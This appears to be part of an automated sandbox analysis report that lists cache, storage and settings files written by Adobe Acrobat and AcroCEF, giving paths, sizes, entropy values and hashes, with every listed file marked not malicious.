SHA-256: | 5A2B79630A52AA8876D6E4FDB4000A12D1CE538E1AB78F0024DDE465DD7F1993 |
SHA-512: | CBCF24CFE46B36AD5FEB509DA4EA31A8C98801B238BC5C4EC5DD9C61498C333EFE11EA6536439A31651E78289A47F7A24C06A50416AE052E9714AFD1E28E8896 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 298 |
Entropy (8bit): | 5.178384318484534 |
Encrypted: | false |
SSDEEP: | 6:iO4qVOqM+q2PN72nKuAl9OmbnIFUtSqVJS/ZmwsqVJSSMVkwON72nKuAl9OmbjLJ:7nO3+vVaHAahFUtZJm/LJiV5OaHAaSJ |
MD5: | E3BE11D3FC2E74E7B97A421CCCD7CC06 |
SHA1: | 39673D6D53B5989DBE72074A5ED605867340941D |
SHA-256: | FD555BDB04DCD2B88064AB3EC6CA9588E8BAA42A818B6435109AC87E22545A32 |
SHA-512: | 1B8B05393A6410D14FA8A5D125491A6C64F295C822163F71A0935FC7AA165DF9E4459D5D1FA839AB7EE09F81B56C39C17102303BD29E3C2EC47B8BF4E8796129 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 298 |
Entropy (8bit): | 5.178384318484534 |
Encrypted: | false |
SSDEEP: | 6:iO4qVOqM+q2PN72nKuAl9OmbnIFUtSqVJS/ZmwsqVJSSMVkwON72nKuAl9OmbjLJ:7nO3+vVaHAahFUtZJm/LJiV5OaHAaSJ |
MD5: | E3BE11D3FC2E74E7B97A421CCCD7CC06 |
SHA1: | 39673D6D53B5989DBE72074A5ED605867340941D |
SHA-256: | FD555BDB04DCD2B88064AB3EC6CA9588E8BAA42A818B6435109AC87E22545A32 |
SHA-512: | 1B8B05393A6410D14FA8A5D125491A6C64F295C822163F71A0935FC7AA165DF9E4459D5D1FA839AB7EE09F81B56C39C17102303BD29E3C2EC47B8BF4E8796129 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 339 |
Entropy (8bit): | 5.141518329260049 |
Encrypted: | false |
SSDEEP: | 6:iO4qV8q2PN72nKuAl9Ombzo2jMGIFUtSqV3HhZmwsqVwbkwON72nKuAl9Ombzo23:7n8vVaHAa8uFUtZ3h/Lwb5OaHAa8RJ |
MD5: | AEADCEB743DADC6E9902E917DE799DAB |
SHA1: | 6DA12B96869BAB993E85582B7A9892083BF3752F |
SHA-256: | 16DBF84216EC06E65CD1CFE7223E1133A98C6CBD9ED31429FE0E5438CCC33578 |
SHA-512: | 7E9102C6AE0790B545235C72DB200C5C94BE7C297C5DB67D2CDF1B650697EBF47DD8CDEF020DAA9561B4C946F81D23755797D71FA8BC19CAED41528482878666 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 339 |
Entropy (8bit): | 5.141518329260049 |
Encrypted: | false |
SSDEEP: | 6:iO4qV8q2PN72nKuAl9Ombzo2jMGIFUtSqV3HhZmwsqVwbkwON72nKuAl9Ombzo23:7n8vVaHAa8uFUtZ3h/Lwb5OaHAa8RJ |
MD5: | AEADCEB743DADC6E9902E917DE799DAB |
SHA1: | 6DA12B96869BAB993E85582B7A9892083BF3752F |
SHA-256: | 16DBF84216EC06E65CD1CFE7223E1133A98C6CBD9ED31429FE0E5438CCC33578 |
SHA-512: | 7E9102C6AE0790B545235C72DB200C5C94BE7C297C5DB67D2CDF1B650697EBF47DD8CDEF020DAA9561B4C946F81D23755797D71FA8BC19CAED41528482878666 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\7de4f866-c90c-4e51-9abb-c206b84c4626.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.949319456905511 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqtWsWsBdOg2Hzcaq3QYiubcP7E4TX:Y2sRdsgWs7dMHK3QYhbA7n7 |
MD5: | 018ADFC1C77FB0679005FCBF2E92EF67 |
SHA1: | BE72968F64A41CB19EFE6F9FCBB4B130B710E5F6 |
SHA-256: | 7B606B510EA3F7F2FD98054D3DD691DD49F3B090A572D7E3E7B5DA195762F707 |
SHA-512: | C27A1DD8B7F3C0B78687611AF0000FD65BD0A1766CE723A0071E4969CB0DC8C9F58E0B52F4A2C736748E0CEB65A73CC3AD0726C318E6A1427ACF299AD5D2D7C7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\92583f00-8987-4dda-aa3d-b87015207870.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.971824627296864 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7 |
MD5: | F326539D084B03D88254A74D6018F692 |
SHA1: | 395B367E0E3554C3E78A8211F2D4B9F0F427CA87 |
SHA-256: | 9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007 |
SHA-512: | C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.971824627296864 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7 |
MD5: | F326539D084B03D88254A74D6018F692 |
SHA1: | 395B367E0E3554C3E78A8211F2D4B9F0F427CA87 |
SHA-256: | 9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007 |
SHA-512: | C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF6831a5.TMP (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.971824627296864 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7 |
MD5: | F326539D084B03D88254A74D6018F692 |
SHA1: | 395B367E0E3554C3E78A8211F2D4B9F0F427CA87 |
SHA-256: | 9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007 |
SHA-512: | C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 5449 |
Entropy (8bit): | 5.248748736895388 |
Encrypted: | false |
SSDEEP: | 96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE7ompR2:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzhI |
MD5: | 6F896683DE3BD5B7647413412DC6F46C |
SHA1: | FD50BC6888FC079F8BEBE74FAF1138EFB39F30F4 |
SHA-256: | F7741ECE91A88E8AEC3D6352077E8D1396A252D68A099F6573138B7E201982C6 |
SHA-512: | 5AE6E2409C4225CF0861B31F91AFC9FA555DEEB8534B59F8EC49BB26EC5CCD3BF6C806EC8BFFF61141F2E772441A33E9ACE05AF2315B0CCD0EDC2AE5A2C65C38 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 327 |
Entropy (8bit): | 5.141325493865709 |
Encrypted: | false |
SSDEEP: | 6:iO4qVuq2PN72nKuAl9OmbzNMxIFUtSqVVZmwsqVgkwON72nKuAl9OmbzNMFLJ:7nuvVaHAa8jFUtZV/Lg5OaHAa84J |
MD5: | 7909A734B7164631FDBE7B86BBDEC43E |
SHA1: | 3447D2D2C40974363B1354D52092AA4B87FE5B44 |
SHA-256: | 4B5EF7AF550963569618C234C05ED75E0BF1ED89A09F250A4175E47370DE4C59 |
SHA-512: | BA3B0AD3BBDC51E42A04C537E07915B98E678A36C5BC41CB37600D4E2C5F5BC0A61BC0DB42618C71278D29C0693FE7DA4F787EB24AA7591134F8A726EDE231AF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 327 |
Entropy (8bit): | 5.141325493865709 |
Encrypted: | false |
SSDEEP: | 6:iO4qVuq2PN72nKuAl9OmbzNMxIFUtSqVVZmwsqVgkwON72nKuAl9OmbzNMFLJ:7nuvVaHAa8jFUtZV/Lg5OaHAa84J |
MD5: | 7909A734B7164631FDBE7B86BBDEC43E |
SHA1: | 3447D2D2C40974363B1354D52092AA4B87FE5B44 |
SHA-256: | 4B5EF7AF550963569618C234C05ED75E0BF1ED89A09F250A4175E47370DE4C59 |
SHA-512: | BA3B0AD3BBDC51E42A04C537E07915B98E678A36C5BC41CB37600D4E2C5F5BC0A61BC0DB42618C71278D29C0693FE7DA4F787EB24AA7591134F8A726EDE231AF |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.4446955015468905 |
Encrypted: | false |
SSDEEP: | 384:SeTci5t5iBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:Las3OazzU89UTTgUL |
MD5: | 2DBC695E7DB49E16799CC963C4E3EB8D |
SHA1: | 80679387F00AF964580C0571C76D65ECF75BF173 |
SHA-256: | 2525F9EC7904CC6B7D3FF898FE36586C82250FD12D4357B1B5B001E1D3139F40 |
SHA-512: | F9C71DF425E0DFCCC61B9ABF549A7582B7B166331460390949A38F1E4AA53F24B2A750D40A0CF2846C67111928EADA5122CB3800C71B13DD1C56A3368490B662 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.2136673036232453 |
Encrypted: | false |
SSDEEP: | 48:7Mvx9nCQqPmFTIF3XmHjBoGGR+jMz+LhG:74XnJ79IVXEBodRBkk |
MD5: | 80276A809DBA714A42D3E7B9E527EAEF |
SHA1: | 8C6C9833FDC1D86E4BA5225BFAE5FE31B2B74BD9 |
SHA-256: | 855FA83646A1026987A112DC9CEEA10178B34F820C9FFA4B974C42DB1A97B079 |
SHA-512: | F9323A90FD0E4BAEAB455B58427CC5D192AC5A0D176E8ED63F29C3D496E12243BDD5DB6A736C7C2C2BE7646E62BAD3F9C39B69B6B663BA4A473B96B37CD83527 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7529698674325394 |
Encrypted: | false |
SSDEEP: | 3:kkFkl9vopM/tfllXlE/HT8kj5lz1NNX8RolJuRdxLlGB9lQRYwpDdt:kKRseT8q5pNMa8RdWBwRd |
MD5: | 65BD3C36EA535E5B29D8FD00994690D9 |
SHA1: | 8316D5C2AB7DA2B260583694C395F47428AB55C3 |
SHA-256: | 242345E01FE4F4F5262845DAD237216F46993C77F4D82585D17C8C4826FC6BAD |
SHA-512: | C80CF06D2D51668048862307DF6B7DDD6104E5456DFDEF157DE2C8635E20459BF21F959AE8A52AC97639F8EDCC3C211E5177E3E1DD554FFC9A14B2BC778CFFE9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 328 |
Entropy (8bit): | 3.233096791118922 |
Encrypted: | false |
SSDEEP: | 6:kKnbPL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:/bPiDImsLNkPlE99SNxAhUe/3 |
MD5: | 024791291CF8C70D0F7F30B532BF15AC |
SHA1: | 531C3DD96643A0EBCAD63D1D54E48E335A8153CE |
SHA-256: | 7E6CF5BFEE9A3D14613D2FC5BEB24A8885A0587FD2AB37106D59E944B101CF10 |
SHA-512: | F8A4EC3D44A13EB8DA5B49447DDB3B0B0B76AAB73E5D490665451F33D65FD2792E55F0B1C1ACC8F114F7599BBAFEBFAFA4FBB5C65F8700F24103017659DE4BBC |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.355961330486138 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXCcSIIAlh0nZiQ0YvkXDoAvJM3g98kUwPeUkwRe9:YvXKXfVH0cQmsGMbLUkee9 |
MD5: | 0D153374BC7021873E234DB59E0366E9 |
SHA1: | 819675642B9D1C7C230E5BA09DF6DD9ED9E027CB |
SHA-256: | A02471F253AB6C73E116C6AE22AE896A1E02743C6056A560303F614C1A9BA581 |
SHA-512: | 3C2F52D416E4504D334837E9753A42F6B4D6ABBAAEB25912523C5E459EBD989FC0746932268DC9B72AD5EEC4F363C1B871A06EF259CDD8B8B454FB42A7EFF9AD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.307530668172941 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXCcSIIAlh0nZiQ0YvkXDoAvJfBoTfXpnrPeUkwRe9:YvXKXfVH0cQmsGWTfXcUkee9 |
MD5: | FDE023E0979F488A487413712B134D72 |
SHA1: | B71E41814EA29B62757065FC679FADA2CD6FB61E |
SHA-256: | 3FFF0BDA43B8F265289AEDD632B492677E3FB932B2877C3688931D38E997F07A |
SHA-512: | FE35127E223947A56B7D22FDBFD8D61E2EBD2690DB1F9B4EAE3889F03C8AA7D75150828F68AAC83263BE1E5B1A633803A31BF7A78530AEAC2BA4F9D4E6C79A93 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.286728416142145 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXCcSIIAlh0nZiQ0YvkXDoAvJfBD2G6UpnrPeUkwRe9:YvXKXfVH0cQmsGR22cUkee9 |
MD5: | 9BAAFF3F95E0995183FA857E6C1275B0 |
SHA1: | C073390AC0DE6EAEB196728B789D57884F34513A |
SHA-256: | 9FF56D87BC0A6963BD58F72A6B8EE37C22D5197F7AA3B869E08119D6B05C4B07 |
SHA-512: | 885FFC5BF57AD28C7FFBBEA68A5EE00C7710E75E8469AB7FF677DE99D998AA8581644ABC85357462C3494DB453D6C5158D08C0F6B17177D101B24AA89E85F922 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.335724184892846 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXCcSIIAlh0nZiQ0YvkXDoAvJfPmwrPeUkwRe9:YvXKXfVH0cQmsGH56Ukee9 |
MD5: | 6C032D734FA19A2205B6A74F8C813528 |
SHA1: | C6997F33BB1325A1F90ED6CCA727CAF19DE4DE7C |
SHA-256: | 4ACA2DE70935648348FC8DE56D660C627FE5590247643AA32B70EEAFD7CFA4EC |
SHA-512: | B09FE617EA6B0A34115825D12B324CCC345BB92BDCC91E56C31DAA20F72D9ABD2DF6B593C734BAB0932AF3442A761366138C0248842DB2B3B56E44D7468D454E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.686608488605644 |
Encrypted: | false |
SSDEEP: | 24:Yv6X1ZQOpLgE9cQx8LennAvzBvkn0RCmK8czOCCSl:YvGhgy6SAFv5Ah8cv/l |
MD5: | 1B988D3B58A8BDC7AD997AFF916E53A5 |
SHA1: | A4EDBD56BBB5311BBE170B183FCD09CC92F83AD0 |
SHA-256: | A989289ABDB9B86175BFFD97B8B3FC8E5BADA4829DB135C3B97467835B7BA945 |
SHA-512: | 02B54C70BBE76DB627EAB8E324D958FA36D9746CA3B96D6FEA107DC03BE005084239E8AF4A6DF5D9912B01103ECA4F5E193558C7B2937319E8139E9D7D41673E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.289237003288008 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXCcSIIAlh0nZiQ0YvkXDoAvJf8dPeUkwRe9:YvXKXfVH0cQmsGU8Ukee9 |
MD5: | 0C49D536F84721A52C67A518CAA8EC89 |
SHA1: | 7128FE7ECC0BD87C64E9F18D50CC408EA243815A |
SHA-256: | A1DEC5240576FA37C4D35EA62A0A2838A53067E28F0B18147F6CBD8F5AC6A39A |
SHA-512: | 4E9B1A459D4CB6FF92563DCA59191773EC7C5F4263D42299B57EF673402C1DE51E4C0C297F26218A370D57036400C3502BB1C86D1F45E0E311A3B388DB99C4FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.292581432954931 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXCcSIIAlh0nZiQ0YvkXDoAvJfQ1rPeUkwRe9:YvXKXfVH0cQmsGY16Ukee9 |
MD5: | D4E4D1CDA2639E9A6EEB879C1B4F3CFD |
SHA1: | 6D8A76C42EF702D0C025E1472A4B9658811A51FB |
SHA-256: | 9F1EFA9B6117F2EE866E3FB5F6CC3A00BFA95CE537A4245D8E3AC05BCEE3F93A |
SHA-512: | 91976F90A6ACD0BBA39295D6CDCEF882AE29B73A937A816F377859C83D009603806942EBC0958EE2D1B4F3ACEFF667C8EBFA9D8C12550FC641F946901DE82691 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.300932200076193 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXCcSIIAlh0nZiQ0YvkXDoAvJfFldPeUkwRe9:YvXKXfVH0cQmsGz8Ukee9 |
MD5: | 353DF441B8DE9F7D2BD768BA3C66DD9D |
SHA1: | 33BF408AC144864C8B42E4F4C241A003B3481CF1 |
SHA-256: | E0AC43724DD3448CA9D162AB7B2E3BB5977518DA54E258E6C0FB3F06BA0611D6 |
SHA-512: | 064F5AAA65A7882CD0DFDAFCC84ED0E6010DBB1D2286FD0F0C9DBB9452A9187A100C4E1B91627540D739C7A17AEAF3E8A78E8A9ABAFFE6A9DEDE5416EC0E0AEA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.3151141076356865 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXCcSIIAlh0nZiQ0YvkXDoAvJfzdPeUkwRe9:YvXKXfVH0cQmsGb8Ukee9 |
MD5: | 595738413121AC8F847B3488F50E17A6 |
SHA1: | 2F90AD28B07EC24E54105B256A01E1797CD929AF |
SHA-256: | 1B600DBEEC39E96AAB11D7650058FD132F5F2EA23E68C9D576275A1093201B84 |
SHA-512: | 2C08CFE4C648A78CA63B315B9AE72656D8E64273B8EFEF8A1CF700DF2D9E1BDB0346FB073AB8BA1310AEB550EE00970FA83F2C5F99F74444D5FE548D9BC66AD9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
